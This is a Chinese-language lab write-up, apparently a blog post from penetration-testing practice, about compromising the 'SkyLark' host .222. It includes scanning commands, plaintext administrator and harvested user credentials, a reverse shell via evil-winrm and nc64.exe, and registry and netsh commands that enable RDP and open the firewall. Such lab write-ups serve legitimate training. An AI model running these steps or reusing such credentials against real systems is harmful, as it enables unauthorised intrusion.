Challenge 3 - SkyLark(6)

 Challenge 3 - SkyLark(6)

下面選定的機器是外網的 .222


 

一樣先進行 Rustscan,└─$ rustscan -a 192.168.224.222 --scripts none --ulimit 5000 | tee rustscan



snmp check,└─$ sudo nmap -sU -p 161 192.168.224.222 | tee snmp                                                          


nmap
2994/tcp  open  veritas-vis2?


enum4linux



利用現有的帳號密碼進行測試看看,發現有效憑證如下

paris03\administrator:MusingExtraCounty98

帳號是 administrator,密碼是 MusingExtraCounty98

這一組密碼是在 DC 機器上的 credentials.txt 檔案內所記載的



直接使用 evil-winrm 進去上載 nc64.exe 再建一個 Reverse Shell 回來



這一台只有 local.txt 沒有 proof.txt



開啟 RDP 與防火牆

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

netsh advfirewall firewall set rule group="remote desktop" new enable=Yes



直接 RDP 進去進行枚舉

└─$ xfreerdp /v:192.168.224.222 /u:'administrator' /p:'MusingExtraCounty98' -drive:aries,/home/kali/lab3/222



這一台的 Powershell History 有許多東西




C:\TFTP_SRV\sip.cfg 裡面發現幾個 username 跟看似 password 的東西
l.nguyen:ChangeMePlease__XMPPTest
j.jones:ChangeMePlease__XMPPTest
j.jameson:ChangeMePlease__XMPPTest




C:\TFTP_SRV\backup.cfg 裡面發現一組我們在 .11 上 ftp1.log 找到的憑證一樣



C:\TFTP_SRV\sip_327.cfg 裡面發現一組憑證

reynolds:bj1ZzWEmJd870YHMsV+NdfsTuce+zsQRyvb7e5fIgY8=



hostname paris03,網路卡僅有一隻腳




更新帳號密碼表



更新攻擊列表




留言

這個網誌中的熱門文章

Challenge 0 - Secura(2)

Challenge 0 - Secura(1)

Challenge 8 - Poseidon(1)